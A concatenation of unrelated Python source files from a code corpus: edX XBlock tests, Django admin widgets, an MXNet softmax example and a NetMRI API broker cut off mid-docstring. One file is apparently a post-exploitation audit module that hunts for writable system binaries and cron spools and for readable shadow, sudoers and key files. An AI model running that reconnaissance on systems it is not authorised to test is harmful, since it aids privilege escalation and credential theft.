# Concrete test class: re-enable discovery disabled in the base.
__test__ = True
def setup_fixtures(self):
# Build a course with a single leaf 'acid' block inside one unit.
course_fix = CourseFixture(
self.course_info['org'],
self.course_info['number'],
self.course_info['run'],
self.course_info['display_name']
)
course_fix.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('vertical', 'Test Unit').add_children(
XBlockFixtureDesc('acid', 'Acid Block')
)
)
)
).install()
# The base class setUp() reads self.user for authentication.
self.user = course_fix.user
class XBlockAcidParentBase(XBlockAcidBase):
"""
Base class for tests that verify that parent XBlock integration is working correctly
"""
# Still abstract: excluded from discovery.
__test__ = False
def validate_acid_block_preview(self, acid_block):
# Parent blocks additionally validate their child checks.
super(XBlockAcidParentBase, self).validate_acid_block_preview(acid_block)
self.assertTrue(acid_block.child_tests_passed)
def test_acid_block_preview(self):
"""
Verify that all expected acid block tests pass in studio preview
"""
self.outline.visit()
subsection = self.outline.section('Test Section').subsection('Test Subsection')
unit = subsection.expand_subsection().unit('Test Unit').go_to()
# Unlike the base class, drill into the container view first.
container = unit.xblocks[0].go_to_container()
acid_block = AcidView(self.browser, container.xblocks[0].preview_selector)
self.validate_acid_block_preview(acid_block)
class XBlockAcidEmptyParentTest(XBlockAcidParentBase):
"""
Tests of an AcidBlock with children
"""
__test__ = True
def setup_fixtures(self):
# Like XBlockAcidChildTest, but the acid_parent block deliberately
# has an empty add_children() call -- a parent with no children.
course_fix = CourseFixture(
self.course_info['org'],
self.course_info['number'],
self.course_info['run'],
self.course_info['display_name']
)
course_fix.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('vertical', 'Test Unit').add_children(
XBlockFixtureDesc('acid_parent', 'Acid Parent Block').add_children(
)
)
)
)
).install()
self.user = course_fix.user
class XBlockAcidChildTest(XBlockAcidParentBase):
"""
Tests of an AcidBlock with children
"""
__test__ = True
def setup_fixtures(self):
# Parent acid block holding two acid children plus an html child.
course_fix = CourseFixture(
self.course_info['org'],
self.course_info['number'],
self.course_info['run'],
self.course_info['display_name']
)
course_fix.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('vertical', 'Test Unit').add_children(
XBlockFixtureDesc('acid_parent', 'Acid Parent Block').add_children(
XBlockFixtureDesc('acid', 'First Acid Child', metadata={'name': 'first'}),
XBlockFixtureDesc('acid', 'Second Acid Child', metadata={'name': 'second'}),
XBlockFixtureDesc('html', 'Html Child', data="<html>Contents</html>"),
)
)
)
)
).install()
self.user = course_fix.user
# NOTE(review): the two overrides below only delegate to super() and
# add nothing -- they look removable unless kept for test labeling.
def test_acid_block_preview(self):
super(XBlockAcidChildTest, self).test_acid_block_preview()
def test_acid_block_editor(self):
super(XBlockAcidChildTest, self).test_acid_block_editor() | unknown | codeparrot/codeparrot-clean | |
from core.vectors import PhpCode, ShellCmd, ModuleExec, Os
from core.module import Module
from core.loggers import log
from core import modules
import utils
class Filesystem(Module):
"""Audit system files for wrong permissions."""
def init(self):
# Module registration: metadata plus one optional 'check' argument
# whose choices are all check_* methods discovered by reflection.
self.register_info(
{
'author': [
'Emilio Pinna'
],
'license': 'GPLv3'
}
)
self.check_functions = [ f for f in dir(self) if f.startswith('check_') ]
self.register_arguments([
{ 'name' : 'check', 'choices' : self.check_functions, 'nargs' : '?' }
])
def check_writable_binaries(self):
"""Search writable files in binary folders"""
results = []
for path in [ '/bin/', '/usr/bin/', '/usr/sbin',
'/sbin', '/usr/local/bin', '/usr/local/sbin',
'/lib/', '/usr/lib/',
'/usr/local/lib' ]:
result = ModuleExec("file_find",
[ '-writable', path ]).run()
# Keep only runs that produced at least one non-empty entry.
if result and any(r for r in result if r):
results += result
return results
def check_writable_etc(self):
"""Search writable files in etc folder"""
result = ModuleExec("file_find",
[ '-writable', '/etc/' ]
).run()
# Implicitly returns None when nothing was found.
if result and any(r for r in result if r):
return result
def check_writable_root(self):
"""Search writable files in / folder"""
result = ModuleExec("file_find",
[ '-no-recursion',
'-writable',
'/' ]
).run()
if result and any(r for r in result if r):
return result
def check_home_writable(self):
"""Search writable files in /home/ folder"""
result = ModuleExec("file_find",
[ '-no-recursion',
'-writable',
'/home/' ]
).run()
if result and any(r for r in result if r):
return result
def check_spool_crons(self):
"""Search writable files in /var/spool/cron/ folder"""
result = ModuleExec("file_find",
[ '-writable',
'/var/spool/cron/' ]
).run()
if result and any(r for r in result if r):
return result
def check_home_executable(self):
"""Search executable files in /home/ folder"""
result = ModuleExec("file_find",
[ '-no-recursion',
'-executable',
'/home/' ]
).run()
if result and any(r for r in result if r):
return result
def check_readable_etc(self):
"""Search certain readable files in etc folder"""
readable_files = ModuleExec("file_find",
[ '-readable', '/etc/' ]
).run()
# Substring patterns of sensitive /etc files worth reporting.
files_paths = [ 'shadow', 'ap-secrets',
'mysql/debian.cnf', 'sa_key$', 'keys',
'\.gpg', 'sudoers' ]
return [ f for f in readable_files
if f and any(p for p in files_paths if p and p in f)]
def check_readable_logs(self):
"""Search certain readable log files"""
readable_files = ModuleExec("file_find",
[ '-readable', '/var/log/' ]
).run()
files_paths = [ 'lastlog', 'dpkg', 'Xorg', 'wtmp',
'pm', 'alternatives', 'udev', 'boot' ]
# Skip rotated logs (.gz / .old), keep matches on the name list.
return [
f for f in readable_files
if f
and not f.endswith('gz')
and not f.endswith('old')
and any(p for p in files_paths if p and p in f)]
def run(self):
# Run all checks (or only the one selected via --check) and collect
# their non-empty results keyed by check name.
results = {}
for func_name in [
# Execute every function starting with check_*
fn for fn in self.check_functions
# if the user does not specify any name
if not self.args.get('check')
# of if specify the current function name
or self.args.get('check') == fn
]:
function = getattr(self, func_name)
log.warn(function.__doc__)
result = function()
if result:
log.info('\n'.join(result))
results.update({ func_name : result })
return results
def print_result(self, result):
# Results are already logged incrementally in run(); nothing to print.
pass | unknown | codeparrot/codeparrot-clean | |
"""
Form Widget classes specific to the Django admin site.
"""
from __future__ import unicode_literals
import copy
from django import forms
from django.contrib.admin.templatetags.admin_static import static
from django.core.urlresolvers import reverse
from django.db.models.deletion import CASCADE
from django.forms.utils import flatatt
from django.forms.widgets import RadioFieldRenderer
from django.template.loader import render_to_string
from django.utils import six
from django.utils.encoding import force_text
from django.utils.html import (
escape, escapejs, format_html, format_html_join, smart_urlquote,
)
from django.utils.safestring import mark_safe
from django.utils.text import Truncator
from django.utils.translation import ugettext as _
class FilteredSelectMultiple(forms.SelectMultiple):
"""
A SelectMultiple with a JavaScript filter interface.
Note that the resulting JavaScript assumes that the jsi18n
catalog has been loaded in the page
"""
@property
def media(self):
js = ["core.js", "SelectBox.js", "SelectFilter2.js"]
return forms.Media(js=[static("admin/js/%s" % path) for path in js])
def __init__(self, verbose_name, is_stacked, attrs=None, choices=()):
self.verbose_name = verbose_name
self.is_stacked = is_stacked
super(FilteredSelectMultiple, self).__init__(attrs, choices)
def render(self, name, value, attrs=None, choices=()):
if attrs is None:
attrs = {}
# CSS class becomes 'selectfilter' or 'selectfilterstacked'.
attrs['class'] = 'selectfilter'
if self.is_stacked:
attrs['class'] += 'stacked'
output = [super(FilteredSelectMultiple, self).render(name, value, attrs, choices)]
output.append('<script type="text/javascript">addEvent(window, "load", function(e) {')
# TODO: "id_" is hard-coded here. This should instead use the correct
# API to determine the ID dynamically.
output.append('SelectFilter.init("id_%s", "%s", %s); });</script>\n'
% (name, escapejs(self.verbose_name), int(self.is_stacked)))
return mark_safe(''.join(output))
class AdminDateWidget(forms.DateInput):
    """Date input styled for the admin, with calendar JS shortcuts."""

    @property
    def media(self):
        # Scripts that power the calendar popup / "Today" shortcut.
        scripts = ("calendar.js", "admin/DateTimeShortcuts.js")
        return forms.Media(js=[static("admin/js/%s" % name) for name in scripts])

    def __init__(self, attrs=None, format=None):
        # Caller-supplied attrs override the admin defaults.
        merged = {'class': 'vDateField', 'size': '10'}
        if attrs is not None:
            merged.update(attrs)
        super(AdminDateWidget, self).__init__(attrs=merged, format=format)
class AdminTimeWidget(forms.TimeInput):
    """Time input styled for the admin, with clock JS shortcuts."""

    @property
    def media(self):
        # Scripts that power the clock popup / "Now" shortcut.
        scripts = ("calendar.js", "admin/DateTimeShortcuts.js")
        return forms.Media(js=[static("admin/js/%s" % name) for name in scripts])

    def __init__(self, attrs=None, format=None):
        # Caller-supplied attrs override the admin defaults.
        merged = {'class': 'vTimeField', 'size': '8'}
        if attrs is not None:
            merged.update(attrs)
        super(AdminTimeWidget, self).__init__(attrs=merged, format=format)
class AdminSplitDateTime(forms.SplitDateTimeWidget):
"""
A SplitDateTime Widget that has some admin-specific styling.
"""
def __init__(self, attrs=None):
widgets = [AdminDateWidget, AdminTimeWidget]
# Note that we're calling MultiWidget, not SplitDateTimeWidget, because
# we want to define widgets.
forms.MultiWidget.__init__(self, widgets, attrs)
def format_output(self, rendered_widgets):
# Wrap the two sub-widgets with "Date:" / "Time:" labels.
return format_html('<p class="datetime">{} {}<br />{} {}</p>',
_('Date:'), rendered_widgets[0],
_('Time:'), rendered_widgets[1])
class AdminRadioFieldRenderer(RadioFieldRenderer):
"""Renderer that wraps each radio input in an <li> inside a styled <ul>."""
def render(self):
"""Outputs a <ul> for this set of radio fields."""
return format_html('<ul{}>\n{}\n</ul>',
flatatt(self.attrs),
format_html_join('\n', '<li>{}</li>',
((force_text(w),) for w in self)))
class AdminRadioSelect(forms.RadioSelect):
# RadioSelect that uses the admin's <ul>-based renderer above.
renderer = AdminRadioFieldRenderer
class AdminFileWidget(forms.ClearableFileInput):
# ClearableFileInput whose templates are wrapped in admin CSS hooks.
template_with_initial = ('<p class="file-upload">%s</p>'
% forms.ClearableFileInput.template_with_initial)
template_with_clear = ('<span class="clearable-file-input">%s</span>'
% forms.ClearableFileInput.template_with_clear)
def url_params_from_lookup_dict(lookups):
    """
    Converts the type of lookups specified in a ForeignKey limit_choices_to
    attribute to a dictionary of query parameters
    """
    params = {}
    if lookups and hasattr(lookups, 'items'):
        for key, value in lookups.items():
            if callable(value):
                value = value()
            if isinstance(value, (tuple, list)):
                # Sequences become comma-separated strings.
                value = ','.join(str(item) for item in value)
            elif isinstance(value, bool):
                # See django.db.fields.BooleanField.get_prep_lookup
                value = '1' if value else '0'
            else:
                value = six.text_type(value)
            params[key] = value
    return params
class ForeignKeyRawIdWidget(forms.TextInput):
"""
A Widget for displaying ForeignKeys in the "raw_id" interface rather than
in a <select> box.
"""
def __init__(self, rel, admin_site, attrs=None, using=None):
# rel: the relation descriptor; using: optional database alias.
self.rel = rel
self.admin_site = admin_site
self.db = using
super(ForeignKeyRawIdWidget, self).__init__(attrs)
def render(self, name, value, attrs=None):
rel_to = self.rel.model
if attrs is None:
attrs = {}
extra = []
if rel_to in self.admin_site._registry:
# The related object is registered with the same AdminSite
related_url = reverse(
'admin:%s_%s_changelist' % (
rel_to._meta.app_label,
rel_to._meta.model_name,
),
current_app=self.admin_site.name,
)
params = self.url_parameters()
if params:
url = '?' + '&'.join('%s=%s' % (k, v) for k, v in params.items())
else:
url = ''
if "class" not in attrs:
attrs['class'] = 'vForeignKeyRawIdAdminField' # The JavaScript code looks for this hook.
# TODO: "lookup_id_" is hard-coded here. This should instead use
# the correct API to determine the ID dynamically.
extra.append('<a href="%s%s" class="related-lookup" id="lookup_id_%s" title="%s"></a>' %
(related_url, url, name, _('Lookup')))
output = [super(ForeignKeyRawIdWidget, self).render(name, value, attrs)] + extra
if value:
# Show a human-readable label next to the raw id.
output.append(self.label_for_value(value))
return mark_safe(''.join(output))
def base_url_parameters(self):
# limit_choices_to may be a dict or a callable returning one.
limit_choices_to = self.rel.limit_choices_to
if callable(limit_choices_to):
limit_choices_to = limit_choices_to()
return url_params_from_lookup_dict(limit_choices_to)
def url_parameters(self):
from django.contrib.admin.views.main import TO_FIELD_VAR
params = self.base_url_parameters()
params.update({TO_FIELD_VAR: self.rel.get_related_field().name})
return params
def label_for_value(self, value):
# Truncated text of the related object; '' when lookup fails.
key = self.rel.get_related_field().name
try:
obj = self.rel.model._default_manager.using(self.db).get(**{key: value})
return ' <strong>%s</strong>' % escape(Truncator(obj).words(14, truncate='...'))
except (ValueError, self.rel.model.DoesNotExist):
return ''
class ManyToManyRawIdWidget(ForeignKeyRawIdWidget):
"""
A Widget for displaying ManyToMany ids in the "raw_id" interface rather than
in a <select multiple> box.
"""
def render(self, name, value, attrs=None):
if attrs is None:
attrs = {}
if self.rel.model in self.admin_site._registry:
# The related object is registered with the same AdminSite
attrs['class'] = 'vManyToManyRawIdAdminField'
if value:
# Multiple ids are serialized as a comma-separated string.
value = ','.join(force_text(v) for v in value)
else:
value = ''
return super(ManyToManyRawIdWidget, self).render(name, value, attrs)
def url_parameters(self):
# M2M lookups never add TO_FIELD_VAR, unlike the FK parent class.
return self.base_url_parameters()
def label_for_value(self, value):
return ''
def value_from_datadict(self, data, files, name):
value = data.get(name)
if value:
return value.split(',')
# NOTE: implicitly returns None for missing/empty input.
class RelatedFieldWidgetWrapper(forms.Widget):
    """
    This class is a wrapper to a given widget to add the add icon for the
    admin interface.

    It delegates all widget behavior to the wrapped widget and decorates its
    rendered output (via the template) with add/change/delete related-object
    links, depending on the can_*_related flags.
    """
    template = 'admin/related_widget_wrapper.html'

    def __init__(self, widget, rel, admin_site, can_add_related=None,
                 can_change_related=False, can_delete_related=False):
        self.needs_multipart_form = widget.needs_multipart_form
        self.attrs = widget.attrs
        self.choices = widget.choices
        self.widget = widget
        self.rel = rel
        # Backwards compatible check for whether a user can add related
        # objects.
        if can_add_related is None:
            can_add_related = rel.model in admin_site._registry
        self.can_add_related = can_add_related
        # XXX: The UX does not support multiple selected values.
        multiple = getattr(widget, 'allow_multiple_selected', False)
        self.can_change_related = not multiple and can_change_related
        # XXX: The deletion UX can be confusing when dealing with cascading deletion.
        cascade = getattr(rel, 'on_delete', None) is CASCADE
        self.can_delete_related = not multiple and not cascade and can_delete_related
        # so we can check if the related object is registered with this AdminSite
        self.admin_site = admin_site

    def __deepcopy__(self, memo):
        # Shallow-copy the wrapper, deep-copy only the wrapped widget.
        obj = copy.copy(self)
        obj.widget = copy.deepcopy(self.widget, memo)
        obj.attrs = self.widget.attrs
        memo[id(self)] = obj
        return obj

    @property
    def is_hidden(self):
        return self.widget.is_hidden

    @property
    def media(self):
        return self.widget.media

    def get_related_url(self, info, action, *args):
        """Reverse the admin URL for `action` on the related model."""
        return reverse("admin:%s_%s_%s" % (info + (action,)),
                       current_app=self.admin_site.name, args=args)

    def render(self, name, value, *args, **kwargs):
        from django.contrib.admin.views.main import IS_POPUP_VAR, TO_FIELD_VAR
        rel_opts = self.rel.model._meta
        info = (rel_opts.app_label, rel_opts.model_name)
        self.widget.choices = self.choices
        url_params = '&'.join("%s=%s" % param for param in [
            (TO_FIELD_VAR, self.rel.get_related_field().name),
            (IS_POPUP_VAR, 1),
        ])
        context = {
            'widget': self.widget.render(name, value, *args, **kwargs),
            'name': name,
            'url_params': url_params,
            'model': rel_opts.verbose_name,
        }
        # '__fk__' is a placeholder the admin JS substitutes with the
        # selected object's pk.
        if self.can_change_related:
            change_related_template_url = self.get_related_url(info, 'change', '__fk__')
            context.update(
                can_change_related=True,
                change_related_template_url=change_related_template_url,
            )
        if self.can_add_related:
            add_related_url = self.get_related_url(info, 'add')
            context.update(
                can_add_related=True,
                add_related_url=add_related_url,
            )
        if self.can_delete_related:
            delete_related_template_url = self.get_related_url(info, 'delete', '__fk__')
            context.update(
                can_delete_related=True,
                delete_related_template_url=delete_related_template_url,
            )
        return mark_safe(render_to_string(self.template, context))

    def build_attrs(self, extra_attrs=None, **kwargs):
        "Helper function for building an attribute dictionary."
        # Bug fix: the original passed extra_attrs=None to the wrapped
        # widget, silently discarding any attrs supplied by the caller.
        # Forward the caller's extra_attrs so they are merged as expected.
        self.attrs = self.widget.build_attrs(extra_attrs, **kwargs)
        return self.attrs

    def value_from_datadict(self, data, files, name):
        return self.widget.value_from_datadict(data, files, name)

    def id_for_label(self, id_):
        return self.widget.id_for_label(id_)
class AdminTextareaWidget(forms.Textarea):
    """Textarea styled with the admin's 'vLargeTextField' CSS class."""
    def __init__(self, attrs=None):
        defaults = {'class': 'vLargeTextField'}
        if attrs is not None:
            defaults.update(attrs)
        super(AdminTextareaWidget, self).__init__(attrs=defaults)
class AdminTextInputWidget(forms.TextInput):
    """Text input styled with the admin's 'vTextField' CSS class."""
    def __init__(self, attrs=None):
        defaults = {'class': 'vTextField'}
        if attrs is not None:
            defaults.update(attrs)
        super(AdminTextInputWidget, self).__init__(attrs=defaults)
class AdminEmailInputWidget(forms.EmailInput):
    """Email input styled with the admin's 'vTextField' CSS class."""
    def __init__(self, attrs=None):
        defaults = {'class': 'vTextField'}
        if attrs is not None:
            defaults.update(attrs)
        super(AdminEmailInputWidget, self).__init__(attrs=defaults)
class AdminURLFieldWidget(forms.URLInput):
    """URL input styled with 'vURLField' that also shows a clickable link."""
    def __init__(self, attrs=None):
        defaults = {'class': 'vURLField'}
        if attrs is not None:
            defaults.update(attrs)
        super(AdminURLFieldWidget, self).__init__(attrs=defaults)

    def render(self, name, value, attrs=None):
        """Render the input; when a value exists, prepend a live link to it."""
        widget_html = super(AdminURLFieldWidget, self).render(name, value, attrs)
        if not value:
            return widget_html
        display_value = force_text(self._format_value(value))
        anchor_attrs = flatatt({'href': smart_urlquote(display_value)})
        return format_html(
            '<p class="url">{} <a{}>{}</a><br />{} {}</p>',
            _('Currently:'), anchor_attrs, display_value,
            _('Change:'), widget_html,
        )
class AdminIntegerFieldWidget(forms.TextInput):
    """Integer text input; subclasses override class_name to restyle."""
    class_name = 'vIntegerField'

    def __init__(self, attrs=None):
        defaults = {'class': self.class_name}
        if attrs is not None:
            defaults.update(attrs)
        super(AdminIntegerFieldWidget, self).__init__(attrs=defaults)
class AdminBigIntegerFieldWidget(AdminIntegerFieldWidget):
    # Same behavior as AdminIntegerFieldWidget; only the CSS class differs.
    class_name = 'vBigIntegerField'
class AdminCommaSeparatedIntegerFieldWidget(forms.TextInput):
    """Text input styled with the admin's 'vCommaSeparatedIntegerField' class."""
    def __init__(self, attrs=None):
        defaults = {'class': 'vCommaSeparatedIntegerField'}
        if attrs is not None:
            defaults.update(attrs)
        super(AdminCommaSeparatedIntegerFieldWidget, self).__init__(attrs=defaults)
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from data import mnist_iterator
import mxnet as mx
import numpy as np
import logging
class NumpySoftmax(mx.operator.NumpyOp):
    """Softmax with cross-entropy gradient, implemented as a NumPy operator.

    forward computes a numerically stable row-wise softmax; backward
    computes the softmax cross-entropy gradient, i.e. softmax(x) minus a
    one-hot encoding of the integer labels.
    """
    def __init__(self):
        # need_top_grad=False: the loss gradient is computed here directly.
        super(NumpySoftmax, self).__init__(False)

    def list_arguments(self):
        return ['data', 'label']

    def list_outputs(self):
        return ['output']

    def infer_shape(self, in_shape):
        # One scalar class index per row of the data batch; output matches
        # the input shape.
        data_shape = in_shape[0]
        label_shape = (in_shape[0][0],)
        output_shape = in_shape[0]
        return [data_shape, label_shape], [output_shape]

    def forward(self, in_data, out_data):
        x = in_data[0]
        y = out_data[0]
        # Subtract the per-row max before exponentiating for numerical
        # stability, then normalize each row to sum to 1.
        y[:] = np.exp(x - x.max(axis=1).reshape((x.shape[0], 1)))
        y /= y.sum(axis=1).reshape((x.shape[0], 1))

    def backward(self, out_grad, in_data, out_data, in_grad):
        l = in_data[1]
        # Bug fix: np.int is a deprecated alias removed in NumPy 1.20+;
        # use an explicit fixed-width integer type for the label indices.
        l = l.reshape((l.size,)).astype(np.int64)
        y = out_data[0]
        dx = in_grad[0]
        # d(loss)/dx for softmax + cross-entropy: softmax(x) - one_hot(label).
        dx[:] = y
        dx[np.arange(l.shape[0]), l] -= 1.0
# define mlp
# Three-layer perceptron for MNIST: 784 inputs -> 128 -> 64 -> 10 classes.
data = mx.symbol.Variable('data')
fc1 = mx.symbol.FullyConnected(data = data, name='fc1', num_hidden=128)
act1 = mx.symbol.Activation(data = fc1, name='relu1', act_type="relu")
fc2 = mx.symbol.FullyConnected(data = act1, name = 'fc2', num_hidden = 64)
act2 = mx.symbol.Activation(data = fc2, name='relu2', act_type="relu")
fc3 = mx.symbol.FullyConnected(data = act2, name='fc3', num_hidden=10)
#mlp = mx.symbol.Softmax(data = fc3, name = 'mlp')
# Attach the custom NumPy softmax operator defined above in place of the
# built-in Softmax symbol (the commented line shows the stock equivalent).
mysoftmax = NumpySoftmax()
mlp = mysoftmax(data=fc3, name = 'softmax')
# data
# Flattened 28x28 images (784 features per sample) in batches of 100.
train, val = mnist_iterator(batch_size=100, input_shape = (784,))
# train
logging.basicConfig(level=logging.DEBUG)
# SGD with momentum and weight decay, on CPU, for 20 epochs.
model = mx.model.FeedForward(
    ctx = mx.cpu(), symbol = mlp, num_epoch = 20,
    learning_rate = 0.1, momentum = 0.9, wd = 0.00001)
model.fit(X=train, eval_data=val)
from ..broker import Broker
class ModelDocBroker(Broker):
    """Broker for the NetMRI ``model_docs`` controller."""

    controller = "model_docs"

    def show(self, **kwargs):
        """Show the details for the specified model doc.

        :param id: The internal NetMRI identifier for this model
            (Integer, required).
        :return model_doc: The model doc identified by the specified id
            (ModelDoc).
        """
        method_name = self._get_method_fullname("show")
        return self.api_request(method_name, kwargs)
def index(self, **kwargs):
"""Lists the available model docs. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param id: The internal NetMRI identifier for this model.
:type id: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param id: The internal NetMRI identifier for this model.
:type id: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, title, model_name, table_name, category, description, history_support, perl_api_ind, java_api_ind, created_at, updated_at, hidden_ind.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each ModelDoc. Valid values are id, title, model_name, table_name, category, description, history_support, perl_api_ind, java_api_ind, created_at, updated_at, hidden_ind. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return model_docs: An array of the ModelDoc objects that match the specified input criteria.
:rtype model_docs: Array of ModelDoc
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""Lists the available model docs matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param category: The category of this model.
:type category: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param category: The category of this model.
:type category: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param created_at: The date and time the record was initially created in NetMRI.
:type created_at: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param created_at: The date and time the record was initially created in NetMRI.
:type created_at: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param description: The description of this model.
:type description: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param description: The description of this model.
:type description: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param hidden_ind: A flag indicating if model is hidden
:type hidden_ind: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param hidden_ind: A flag indicating if model is hidden
:type hidden_ind: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param history_support: History support.
:type history_support: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param history_support: History support.
:type history_support: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param id: The internal NetMRI identifier for this model.
:type id: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param id: The internal NetMRI identifier for this model.
:type id: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param java_api_ind: A flag indicating if model is in java API
:type java_api_ind: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param java_api_ind: A flag indicating if model is in java API
:type java_api_ind: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param model_name: The name of model.
:type model_name: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param model_name: The name of model.
:type model_name: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param perl_api_ind: A flag indicating if model is in perl API
:type perl_api_ind: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param perl_api_ind: A flag indicating if model is in perl API
:type perl_api_ind: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param table_name: The name of database table where model records are stored.
:type table_name: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param table_name: The name of database table where model records are stored.
:type table_name: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param title: The title of model.
:type title: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param title: The title of model.
:type title: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param updated_at: The date and time the record was last modified in NetMRI.
:type updated_at: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param updated_at: The date and time the record was last modified in NetMRI.
:type updated_at: Array of DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, title, model_name, table_name, category, description, history_support, perl_api_ind, java_api_ind, created_at, updated_at, hidden_ind.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each ModelDoc. Valid values are id, title, model_name, table_name, category, description, history_support, perl_api_ind, java_api_ind, created_at, updated_at, hidden_ind. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
